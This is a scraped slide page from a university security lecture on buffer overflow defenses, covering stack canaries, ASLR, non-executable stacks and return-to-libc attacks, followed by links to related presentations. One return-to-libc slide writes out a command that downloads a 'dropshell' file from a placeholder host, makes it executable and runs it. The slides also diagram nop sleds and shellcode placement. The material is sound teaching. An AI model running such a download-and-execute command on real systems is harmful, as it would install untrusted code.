buffer overflow defenses countermeasures
play

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 - PowerPoint PPT Presentation

Aug 01, 2023 •174 likes •1.12k views

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess the raw address)

  1. BUFFER OVERFLOW 
 DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018

  2. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 • Finding the return address (guess the raw address) 
 • Getting %eip to point to our code (dist buff to stored eip)

  3. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 … buffer

  4. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 … buffer

  5. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 02 8d e2 10 … buffer canary

  6. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  7. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  8. DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  9. DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary What value should the canary have?

  10. CANARY VALUES From StackGuard [Wagle & Cowan] 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new random value @ each process start • Save the real value somewhere in memory • Must write-protect the stored value 3. Random XOR canaries • Same as random canaries • But store canary XOR some control info, instead

  11. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 Option: Make this detectable with canaries • Finding the return address (guess the raw address) 
 • Getting %eip to point to our code (dist buff to stored eip)

  12. ADDRESS SPACE LAYOUT RANDOMIZATION 4G 0xffffffff Set when 
 cmdline & env process starts int f() { 
 Stack int x; … Runtime Heap malloc(sizeof(long)); Uninit’d data static int x; Known at Init’d data static const int y=10; compile time Text 0 0x00000000 Randomize where exactly these regions start

  13. ADDRESS SPACE LAYOUT RANDOMIZATION Shortcomings of ASLR • Introduces return-to-libc atk • Probes for location of usleep • On 32-bit architectures, 
 only 16 bits of entropy • fork() keeps same offsets

  14. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 Option: Make this detectable with canaries • Finding the return address (guess the raw address) 
 Address Space Layout Randomization ( ASLR ) • Getting %eip to point to our code (dist buff to stored eip)

  15. GETTING %EIP TO POINT TO OUR CODE Recall that all memory has Read, Write, and Execute permissions 4G 0xffffffff cmdline & env Stack Must be 
 But does it 
 readable & 
 need to be 
 writeable executable? Heap Basic idea: 
 Uninit’d data make the stack 
 Init’d data non-executable Must be 
 Text executable 0 0x00000000

  16. RETURN TO LIBC Exploit:

  17. RETURN TO LIBC Exploit: Preferred: strlcpy char buf[4]; 
 strncpy(buf, “hello!”, sizeof(buf)); 
 buf = {‘h’, ‘e’, ‘l’, ‘l’} strlcpy(buf, “hello!”, sizeof(buf)); buf = {‘h’, ‘e’, ‘l’, ‘\0’}

  18. RETURN TO LIBC Exploit: Goal: system(“wget http://www.example.com/dropshell ; 
 chmod +x dropshell ; 
 ./dropshell”); Non-executable stack Challenge: “ system ” already exists somewhere in libc Insight:

  19. RETURN TO LIBC text ... %eip &arg1 %ebp 00 00 00 00 … buffer stack frame %eip

  20. RETURN TO LIBC padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... buffer stack frame %eip

  21. RETURN TO LIBC good 
 guess padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... buffer stack frame %eip

  22. RETURN TO LIBC good 
 nop sled guess padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  23. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  24. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  25. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip PANIC: address not executable

  26. RETURN TO LIBC libc ... ... ... usleep() printf() system() text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  27. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  28. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  29. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip

  30. RETURN TO LIBC libc ... ... ... usleep() printf() system() How do we guess this address? padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip

  31. RETURN TO LIBC libc ... ... ... usleep() printf() system() How do we guess this address? padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer How do we ensure these are the args? %eip

  32. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  33. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  34. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  35. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %ebp leave : mov %ebp %esp pop %ebp %esp ret : pop %eip

  36. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  37. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %eip %esp leave : mov %ebp %esp pop %ebp ret : pop %eip At this point, we can’t reliably access local variables

  38. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %eip %esp leave : mov %ebp %esp pop %ebp ret : pop %eip At this point, we can’t reliably access local variables

  39. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  40. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  41. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %esp %ebp

  42. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() Will expect args at 8(%ebp) padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %esp %ebp

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Last time We finished up By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow defenses (and workarounds) Format string vulnerabilities Integer overflow vulnerabilities This time

1.29k views • 80 slides
Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern

873 views • 53 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Last time We continued By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow attacks & other vulnerabilities Overflow defenses Everything youve always wanted to know about

2.41k views • 197 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.49k views • 117 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.23k views • 95 slides
Buffer Overflow Attacks & Defenses Slides are borrowed from Franziska Roesner @UW and Dawn

Buffer Overflow Attacks & Defenses Slides are borrowed from Franziska Roesner @UW and Dawn

Buffer Overflow Attacks & Defenses Slides are borrowed from Franziska Roesner @UW and Dawn Song @Berkeley Linux (32-bit) process memory layout -0xFFFFFFFF Reserved for Kernal -0xC0000000 user stack %esp shared libraries -0x40000000

994 views • 85 slides
Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko,

Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko,

CSE 127: Computer Security Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko, Stefan Savage, and Stephen Checkoway Today: mitigating buffer overflows Lecture objectives: Understand how to

1.33k views • 130 slides
Software Security: Buffer Overflow Defenses Autumn 2020 Franziska (Franzi) Roesner

Software Security: Buffer Overflow Defenses Autumn 2020 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Autumn 2020 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

234 views • 22 slides
Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner

Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

760 views • 23 slides
Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by the Morris Worm in 1988 Prevention techniques known NX bit, stack canaries, ASLR Still of major concern Recent examples:

354 views • 21 slides
Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer Science Rutgers University http://www.cs.rutgers.edu/~vinodg/416 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red,

950 views • 55 slides
Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

1 Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed in buffer overflow exploits to create backdoors Execution of additional network services via the INETD daemon The addition of new users

497 views • 30 slides
Buffer Overflow CS461/ECE422 Spring 2012 Reading Material

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material Based on Chapter 11 of the text Outline Buffer Overflow Stack Buffer Overflow Shell

783 views • 28 slides
History of the Stack Overflow Buffer Overflow Understood

History of the Stack Overflow Buffer Overflow Understood

History of the Stack Overflow Buffer Overflow Understood as early as 1972 Computer Security Technology Planning Study Morris Worm First

1.07k views • 42 slides
CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking & Loading, continued Buffer Overflow Read: CSAPP2: section 3.12: out-of-bounds memory references & buffer overflow K&R:

775 views • 43 slides
Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code

Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code

Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code Challenges in exploitation Shellcode Countermeasures Program Memory Stack a,b, ptr ptr points to the memory here y x Order of the function

368 views • 36 slides
Designing costless abstractions Bart Verhagen bart@verhagenconsultancy.be 16 November 2019

Designing costless abstractions Bart Verhagen bart@verhagenconsultancy.be 16 November 2019

Designing costless abstractions Bart Verhagen bart@verhagenconsultancy.be 16 November 2019 Introduction Definitions What??? xkcd. Is It Worth the Time? url : https://xkcd.com/1205/ Introduction Definitions Costless abstractions Software

443 views • 32 slides
Dyninst Scalable Tools Workshop Granlibakken Resort Lake Tahoe, California Dyninst Scalable

Dyninst Scalable Tools Workshop Granlibakken Resort Lake Tahoe, California Dyninst Scalable

Dyninst Scalable Tools Workshop Granlibakken Resort Lake Tahoe, California Dyninst Scalable Tools Workshop A Brief Introduction to Dyninst Dyninst: a tool for static and dynamic binary instrumentation and modification 2 Dyninst Scalable

711 views • 47 slides
Electronic Business Documents UBL v2.1 Building on the Foundation 1 (2014-11-21 13:20z) OASIS

Electronic Business Documents UBL v2.1 Building on the Foundation 1 (2014-11-21 13:20z) OASIS

OASIS Universal Business Language Electronic Business Documents UBL v2.1 Building on the Foundation 1 (2014-11-21 13:20z) OASIS Universal Business Language Innovative Uses of UBL Today sourcing, procurement, replenishment pre-award and

373 views • 6 slides
JANUARY 2020 TELEPHONE DO NOT USE COMPUTER AUDIO REGIONAL CALLS PARTICIPATE IN DISCUSSION

JANUARY 2020 TELEPHONE DO NOT USE COMPUTER AUDIO REGIONAL CALLS PARTICIPATE IN DISCUSSION

PLEASE CALL IN USING A JANUARY 2020 TELEPHONE DO NOT USE COMPUTER AUDIO REGIONAL CALLS PARTICIPATE IN DISCUSSION BY UNMUTING YOUR PHONE OR USING THE WEBINAR PANEL Your code and Audio PIN are here Agenda Legislative Update DOE

373 views • 23 slides
Equity & inclusion as a way of developing diverse, resilient, and more relevant open source

Equity & inclusion as a way of developing diverse, resilient, and more relevant open source

Equity & inclusion as a way of developing diverse, resilient, and more relevant open source software Griselda Cuevas | Aizhamal Nurmamat kyzy Airflow Summit July 6-17, 2020 What we will discuss Common challenges for Open Source

689 views • 58 slides
Introduction Synopsis 1 #include <sys/ptrace.h> long int ptrace(enum __ptrace_request

Introduction Synopsis 1 #include <sys/ptrace.h> long int ptrace(enum __ptrace_request

System Call Tracing using ptrace 1/15/04 Ptrace Introduction Synopsis 1 #include <sys/ptrace.h> long int ptrace(enum __ptrace_request request , pid_t pid , void * addr , void * data ) Description 2 The ptrace system call provides

380 views • 6 slides
CE Report Workplace Climate and Environment Previously known as EDI Now a user initiative

CE Report Workplace Climate and Environment Previously known as EDI Now a user initiative

CE Report Workplace Climate and Environment Previously known as EDI Now a user initiative with UEC+FSPA+General Users. Main objectives Host a seminar series centered around workplace climate issues like diversity, equity,

477 views • 4 slides
1 NSERC Information Session Scholarships and Fellowships 2018-2019 Trent University Sarah

1 NSERC Information Session Scholarships and Fellowships 2018-2019 Trent University Sarah

1 NSERC Information Session Scholarships and Fellowships 2018-2019 Trent University Sarah Smith & Kevin Belanger September 18th, 2018 2 Agenda EDI initiatives at NSERC Postgraduate programs Postdoctoral programs How to

1.19k views • 82 slides

More recommend